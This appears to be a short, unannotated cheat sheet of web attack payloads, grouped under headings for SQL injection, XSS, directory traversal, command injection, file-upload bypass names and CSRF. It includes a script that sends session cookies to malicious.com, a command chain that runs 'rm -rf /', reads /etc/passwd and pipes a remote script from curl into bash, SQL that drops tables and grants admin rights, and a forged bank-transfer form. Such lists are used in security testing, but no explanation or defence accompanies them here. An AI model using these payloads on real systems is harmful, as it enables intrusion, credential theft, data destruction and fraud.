SQL Injection Example
SELECT * FROM users WHERE username = '$input' AND password = '$pass'; DROP TABLE users; SELECT * FROM sensitive_data WHERE user_id = '1' OR '1'='1'; UPDATE users SET admin='true' WHERE username='$input'
XSS Attack Pattern
<script>document.cookie='session='+document.cookie; new Image().src='http://malicious.com/steal?cookie='+document.cookie;</script><img src=x onerror='alert(document.cookie)'><iframe src='javascript:alert(`xss`)'></iframe>
Directory Traversal
../../../etc/passwd
../../../etc/shadow
../../../var/www/html/config.php
../../../usr/local/etc/apache2/httpd.conf
../../../../Windows/system.ini
..\..\..\Windows\win.ini
Command Injection
ping 192.168.1.1; rm -rf /; cat /etc/passwd; echo 'malicious' > system.txt; $(curl http://malicious.com/script.sh | bash)
File Upload Exploit
malware.php.jpg
shell.aspx.jpeg
exploit.jsp.png
backdoor.php%00.jpg
webshell.php%20
malicious.php;.jpg
CSRF Attack
<form action='http://bank.com/transfer' method='POST'><input type='hidden' name='amount' value='1000'><input type='hidden' name='to' value='attacker'></form><script>document.forms[0].submit()</script>